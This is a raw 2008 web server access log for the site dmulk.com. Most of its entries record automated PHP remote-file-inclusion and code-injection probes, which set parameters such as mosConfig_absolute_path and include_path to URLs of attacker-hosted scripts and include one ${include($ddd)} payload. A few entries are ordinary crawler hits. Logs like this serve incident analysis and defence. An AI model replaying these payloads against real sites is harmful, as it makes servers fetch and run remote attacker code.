205.134.252.194 - - [24/Jun/2008:09:21:58 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.geocities.com/ago3sd3dy/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
205.134.252.194 - - [24/Jun/2008:09:21:58 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.geocities.com/ago3sd3dy/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
82.208.32.7 - - [24/Jun/2008:09:22:31 -0700] "GET /logs/access_071219.log//includes/messages.inc.php?include_path=http://www.tnwnepal.org/kang.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.208.32.7 - - [24/Jun/2008:09:22:31 -0700] "GET //includes/messages.inc.php?include_path=http://www.tnwnepal.org/kang.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.208.32.7 - - [24/Jun/2008:09:22:32 -0700] "GET /logs//includes/messages.inc.php?include_path=http://www.tnwnepal.org/kang.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.208.32.7 - - [24/Jun/2008:09:22:37 -0700] "GET /logs/access_071219.log//includes/messages.inc.php?include_path=http://www.tnwnepal.org/kang.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.208.32.7 - - [24/Jun/2008:09:22:38 -0700] "GET //includes/messages.inc.php?include_path=http://www.tnwnepal.org/kang.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.208.32.7 - - [24/Jun/2008:09:22:38 -0700] "GET /logs//includes/messages.inc.php?include_path=http://www.tnwnepal.org/kang.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.48.80.144 - - [24/Jun/2008:09:23:05 -0700] "GET /logs/access_071230.log//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://portalnet.ro/rss-trend/idv.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.48.80.144 - - [24/Jun/2008:09:23:05 -0700] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://portalnet.ro/rss-trend/idv.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.48.80.144 - - [24/Jun/2008:09:23:05 -0700] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://portalnet.ro/rss-trend/idv.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
81.15.36.156 - - [24/Jun/2008:09:23:12 -0700] "GET /logs/index.php?option=com_content&task=view&id=&mosConfig_absolute_path=http://83.19.144.26/go.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
193.109.140.37 - - [24/Jun/2008:09:23:17 -0700] "GET //index.php?_REQUEST=&_REQUEST%1boption%1d=com_rss&_REQUEST%1bItemid%1d=1&GLOBALS=&mosConfig_absolute_path=http://auctionsbymaggie.com/id.txt? HTTP/1.1" 200 50 "-" "libwww-perl/5.805" "www.dmulk.com"
208.89.210.131 - - [24/Jun/2008:09:23:24 -0700] "GET /logs/access_080325.log/common/db.php?commonpath=http://xl-electronics.com/ebay/icons/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
85.103.62.177 - - [24/Jun/2008:09:23:27 -0700] "GET /logs/access_080117.log HTTP/1.0" 200 262144 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
66.48.80.144 - - [24/Jun/2008:09:23:33 -0700] "GET /logs/access.log//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://portalnet.ro/rss-trend/idv.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
205.134.252.194 - - [24/Jun/2008:09:23:34 -0700] "GET /logs/access_080117.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.geocities.com/ago3sd3dy/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
81.15.36.156 - - [24/Jun/2008:09:23:34 -0700] "GET /index.php?option=com_content&task=view&id=&mosConfig_absolute_path=http://83.19.144.26/go.do?? HTTP/1.1" 500 374 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
64.22.89.194 - - [24/Jun/2008:09:23:35 -0700] "GET /logs//includes/messages.inc.php?include_path=http://www.hongikspine.co.kr/bbs/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [24/Jun/2008:09:23:35 -0700] "GET //includes/messages.inc.php?include_path=http://www.hongikspine.co.kr/bbs/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
153.19.101.68 - - [24/Jun/2008:09:23:38 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
153.19.101.68 - - [24/Jun/2008:09:23:38 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
153.19.101.68 - - [24/Jun/2008:09:23:38 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
153.19.101.68 - - [24/Jun/2008:09:23:39 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
205.134.252.194 - - [24/Jun/2008:09:23:40 -0700] "GET /logs/access_080117.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.geocities.com/ago3sd3dy/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
205.134.252.194 - - [24/Jun/2008:09:23:44 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.geocities.com/ago3sd3dy/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
205.134.252.194 - - [24/Jun/2008:09:23:51 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.geocities.com/ago3sd3dy/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.53.197.2 - - [24/Jun/2008:09:24:20 -0700] "GET /logs//includes/messages.inc.php?include_path=http://h1.ripway.com/gang11/scan/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.197.2 - - [24/Jun/2008:09:24:20 -0700] "GET //includes/messages.inc.php?include_path=http://h1.ripway.com/gang11/scan/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
205.134.252.194 - - [24/Jun/2008:09:24:22 -0700] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=:http://www.geocities.com/ago3sd3dy/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.79.46.20 - - [24/Jun/2008:09:24:41 -0700] "GET /logs/errors.php?error=http://queb3.info/cruise/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
64.79.46.20 - - [24/Jun/2008:09:24:41 -0700] "GET /errors.php?error=http://queb3.info/cruise/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
87.246.68.55 - - [24/Jun/2008:09:24:47 -0700] "GET /logs//includes/messages.inc.php?include_path=http://travninni.se/poll/polldata/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
87.246.68.55 - - [24/Jun/2008:09:24:47 -0700] "GET //includes/messages.inc.php?include_path=http://travninni.se/poll/polldata/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
85.103.62.177 - - [24/Jun/2008:09:24:48 -0700] "GET /logs/access_080117.log HTTP/1.0" 200 670488 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
217.20.138.101 - - [24/Jun/2008:09:24:54 -0700] "GET /logs//includes/messages.inc.php?include_path=http://www.konkylie.no/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.20.138.101 - - [24/Jun/2008:09:24:54 -0700] "GET //includes/messages.inc.php?include_path=http://www.konkylie.no/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.148.95.147 - - [24/Jun/2008:09:25:26 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.148.95.147 - - [24/Jun/2008:09:25:26 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
62.112.193.46 - - [24/Jun/2008:09:25:29 -0700] "GET /logs//includes/messages.inc.php?include_path=http://www.konkylie.no/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.112.193.46 - - [24/Jun/2008:09:25:30 -0700] "GET //includes/messages.inc.php?include_path=http://www.konkylie.no/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.82.114.151 - - [24/Jun/2008:09:25:35 -0700] "GET /logs/access_080215.log/errors.php?error=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
80.82.114.151 - - [24/Jun/2008:09:25:35 -0700] "GET /errors.php?error=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
80.82.114.151 - - [24/Jun/2008:09:25:35 -0700] "GET /logs/errors.php?error=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
80.82.114.151 - - [24/Jun/2008:09:25:37 -0700] "GET /logs/access_080215.log/errors.php?error=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
80.82.114.151 - - [24/Jun/2008:09:25:38 -0700] "GET /logs/errors.php?error=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
80.82.114.151 - - [24/Jun/2008:09:25:39 -0700] "GET /errors.php?error=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
74.6.17.181 - - [24/Jun/2008:09:25:45 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
67.195.52.111 - - [24/Jun/2008:09:26:06 -0700] "GET /blog/xmlrpc.php HTTP/1.0" 500 358 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
67.195.54.30 - - [24/Jun/2008:09:26:16 -0700] "GET /blog/wp-includes/wlwmanifest.xml HTTP/1.0" 200 1013 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
64.22.89.194 - - [24/Jun/2008:09:26:41 -0700] "GET /logs/access.log//popup_window.php?site_isp_root=http://www.hongikspine.co.kr/bbs/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [24/Jun/2008:09:26:41 -0700] "GET //popup_window.php?site_isp_root=http://www.hongikspine.co.kr/bbs/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [24/Jun/2008:09:26:41 -0700] "GET /logs//popup_window.php?site_isp_root=http://www.hongikspine.co.kr/bbs/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.6.22.157 - - [24/Jun/2008:09:26:57 -0700] "GET /logs/access_071212.log HTTP/1.0" 200 89527 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
216.134.212.103 - - [24/Jun/2008:09:27:14 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.freewebs.com/haddem/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
216.134.212.103 - - [24/Jun/2008:09:27:14 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.freewebs.com/haddem/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
217.20.138.101 - - [24/Jun/2008:09:27:15 -0700] "GET /logs/access_071219.log//includes/messages.inc.php?include_path=http://www.konkylie.no/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.20.138.101 - - [24/Jun/2008:09:27:15 -0700] "GET //includes/messages.inc.php?include_path=http://www.konkylie.no/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.20.138.101 - - [24/Jun/2008:09:27:15 -0700] "GET /logs//includes/messages.inc.php?include_path=http://www.konkylie.no/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.112.193.46 - - [24/Jun/2008:09:27:33 -0700] "GET /logs/access_071219.log//includes/messages.inc.php?include_path=http://www.konkylie.no/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.112.193.46 - - [24/Jun/2008:09:27:33 -0700] "GET //includes/messages.inc.php?include_path=http://www.konkylie.no/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.112.193.46 - - [24/Jun/2008:09:27:34 -0700] "GET /logs//includes/messages.inc.php?include_path=http://www.konkylie.no/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.20.73.217 - - [24/Jun/2008:09:27:40 -0700] "GET /logs/access_080218.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://h1.ripway.com/jum/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
209.20.73.217 - - [24/Jun/2008:09:27:47 -0700] "GET /logs/access_080215.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://h1.ripway.com/jum/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [24/Jun/2008:09:28:17 -0700] "GET /logs/access_071230.log//popup_window.php?site_isp_root=http://www.hongikspine.co.kr/bbs/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
8.2.208.2 - - [24/Jun/2008:09:28:34 -0700] "GET /logs/errors.php?error=http://www.goodimmo.com/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
8.2.208.2 - - [24/Jun/2008:09:28:34 -0700] "GET /errors.php?error=http://www.goodimmo.com/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
200.30.73.117 - - [24/Jun/2008:09:28:41 -0700] "GET /logs/access_080127.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.gg2003.de/phpBB2//language/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.30.73.117 - - [24/Jun/2008:09:28:45 -0700] "GET /logs/access_080127.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.gg2003.de/phpBB2//language/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.30.73.117 - - [24/Jun/2008:09:28:46 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.gg2003.de/phpBB2//language/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.30.73.117 - - [24/Jun/2008:09:28:47 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.gg2003.de/phpBB2//language/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.30.73.117 - - [24/Jun/2008:09:28:48 -0700] "GET /logs/access_080127.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.gg2003.de/phpBB2//language/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.30.73.117 - - [24/Jun/2008:09:28:49 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.gg2003.de/phpBB2//language/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.30.73.117 - - [24/Jun/2008:09:28:49 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.gg2003.de/phpBB2//language/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.30.73.117 - - [24/Jun/2008:09:28:50 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.gg2003.de/phpBB2//language/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.30.73.117 - - [24/Jun/2008:09:28:53 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.gg2003.de/phpBB2//language/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
79.170.90.64 - - [24/Jun/2008:09:29:01 -0700] "GET /logs/tikiwiki/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.phpinfo()&t=png&title=http://freedownloads-free.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.53.197.2 - - [24/Jun/2008:09:29:01 -0700] "GET /logs/access.log//popup_window.php?site_isp_root=http://h1.ripway.com/gang11/scan/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
79.170.90.64 - - [24/Jun/2008:09:29:01 -0700] "GET /tikiwiki/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.phpinfo()&t=png&title=http://freedownloads-free.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.53.197.2 - - [24/Jun/2008:09:29:01 -0700] "GET //popup_window.php?site_isp_root=http://h1.ripway.com/gang11/scan/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.197.2 - - [24/Jun/2008:09:29:01 -0700] "GET /logs//popup_window.php?site_isp_root=http://h1.ripway.com/gang11/scan/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.15.36.156 - - [24/Jun/2008:09:29:05 -0700] "GET /logs/index.php?option=com_content&task=view&id=&mosConfig_absolute_path=http://83.19.144.26/go.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
81.15.36.156 - - [24/Jun/2008:09:29:23 -0700] "GET /index.php?option=com_content&task=view&id=&mosConfig_absolute_path=http://83.19.144.26/go.do?? HTTP/1.1" 500 374 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
77.221.130.15 - - [24/Jun/2008:09:29:32 -0700] "GET /logs/access_071219.log//includes/messages.inc.php?include_path=http://www.archfuck.ru/administrator/components/com_remository/arab.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.203.122.236 - - [24/Jun/2008:09:29:42 -0700] "GET /logs/access.log//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://189.20.64.27/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.91.118.150 - - [24/Jun/2008:09:29:44 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://portalnet.ro/rss-trend/idv.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.91.118.150 - - [24/Jun/2008:09:29:44 -0700] "GET /logs/access_080201.log//modules/vwar/admin/admin.php?vwar_root=http://portalnet.ro/rss-trend/idv.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.91.118.150 - - [24/Jun/2008:09:29:44 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://portalnet.ro/rss-trend/idv.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.203.122.236 - - [24/Jun/2008:09:29:45 -0700] "GET //components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://189.20.64.27/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.203.122.236 - - [24/Jun/2008:09:29:46 -0700] "GET /logs//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://189.20.64.27/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.12.53.176 - - [24/Jun/2008:09:30:06 -0700] "GET /upgrade_album.php?GALLERY_BASEDIR=http://nicosahputra.ueuo.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
195.12.53.176 - - [24/Jun/2008:09:30:06 -0700] "GET /logs/upgrade_album.php?GALLERY_BASEDIR=http://nicosahputra.ueuo.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
87.246.68.55 - - [24/Jun/2008:09:30:25 -0700] "GET /logs/access_071219.log//includes/messages.inc.php?include_path=http://travninni.se/poll/polldata/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
87.246.68.55 - - [24/Jun/2008:09:30:25 -0700] "GET //includes/messages.inc.php?include_path=http://travninni.se/poll/polldata/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
80.91.118.150 - - [24/Jun/2008:09:30:26 -0700] "GET /logs/access_080127.log//modules/vwar/admin/admin.php?vwar_root=http://portalnet.ro/rss-trend/idv.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.246.68.55 - - [24/Jun/2008:09:30:26 -0700] "GET /logs//includes/messages.inc.php?include_path=http://travninni.se/poll/polldata/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
198.170.79.237 - - [24/Jun/2008:09:30:35 -0700] "GET /logs/access.log/index.php?url=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id1.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
198.170.79.237 - - [24/Jun/2008:09:30:41 -0700] "GET /logs/index.php?url=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id1.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
66.48.80.144 - - [24/Jun/2008:09:30:41 -0700] "GET /logs/access_080328.log//index.php?option=com_custompages&cpage=http://portalnet.ro/rss-trend/idv.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.48.80.144 - - [24/Jun/2008:09:30:41 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://portalnet.ro/rss-trend/idv.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.48.80.144 - - [24/Jun/2008:09:30:41 -0700] "GET /logs/access_080331.log//index.php?option=com_custompages&cpage=http://portalnet.ro/rss-trend/idv.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.53.197.2 - - [24/Jun/2008:09:30:54 -0700] "GET /logs/access_071230.log//popup_window.php?site_isp_root=http://h1.ripway.com/gang11/scan/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
198.170.79.237 - - [24/Jun/2008:09:30:56 -0700] "GET /index.php?url=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id1.txt? HTTP/1.0" 500 358 "-" "libwww-perl/5.50" "www.dmulk.com"
66.48.80.144 - - [24/Jun/2008:09:31:02 -0700] "GET //index.php?option=com_custompages&cpage=http://portalnet.ro/rss-trend/idv.txt??? HTTP/1.1" 500 374 "-" "libwww-perl/5.811" "www.dmulk.com"
69.20.5.26 - - [24/Jun/2008:09:31:10 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST%1boption%1d=com_rss&_REQUEST%1bItemid%1d=1&GLOBALS=&mosConfig_absolute_path=http://auctionsbymaggie.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.20.5.26 - - [24/Jun/2008:09:31:10 -0700] "GET //index.php?_REQUEST=&_REQUEST%1boption%1d=com_rss&_REQUEST%1bItemid%1d=1&GLOBALS=&mosConfig_absolute_path=http://auctionsbymaggie.com/id.txt? HTTP/1.1" 200 50 "-" "libwww-perl/5.79" "www.dmulk.com"
69.20.5.26 - - [24/Jun/2008:09:31:10 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST%1boption%1d=com_rss&_REQUEST%1bItemid%1d=1&GLOBALS=&mosConfig_absolute_path=http://auctionsbymaggie.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.246.252.46 - - [24/Jun/2008:09:32:20 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST%1boption%1d=com_rss&_REQUEST%1bItemid%1d=1&GLOBALS=&mosConfig_absolute_path=http://auctionsbymaggie.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.246.252.46 - - [24/Jun/2008:09:32:21 -0700] "GET //index.php?_REQUEST=&_REQUEST%1boption%1d=com_rss&_REQUEST%1bItemid%1d=1&GLOBALS=&mosConfig_absolute_path=http://auctionsbymaggie.com/id.txt? HTTP/1.1" 200 50 "-" "libwww-perl/5.79" "www.dmulk.com"
66.246.252.46 - - [24/Jun/2008:09:32:21 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST%1boption%1d=com_rss&_REQUEST%1bItemid%1d=1&GLOBALS=&mosConfig_absolute_path=http://auctionsbymaggie.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.89.22.121 - - [24/Jun/2008:09:32:55 -0700] "GET /!scanhttp://sucomais2.angelfire.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
198.170.79.237 - - [24/Jun/2008:09:33:59 -0700] "GET /logs/access_080118.log/index.php?url=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id1.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
87.230.6.12 - - [24/Jun/2008:09:34:23 -0700] "GET /logs/errors.php?error=http://queb3.info/cruise/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.6.12 - - [24/Jun/2008:09:34:24 -0700] "GET /errors.php?error=http://queb3.info/cruise/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.30.73.117 - - [24/Jun/2008:09:34:24 -0700] "GET /logs/access_080110.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.gg2003.de/phpBB2//language/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.30.73.117 - - [24/Jun/2008:09:34:24 -0700] "GET /logs/access_080110.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.gg2003.de/phpBB2//language/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.30.73.117 - - [24/Jun/2008:09:34:30 -0700] "GET /logs/access_080110.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.gg2003.de/phpBB2//language/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
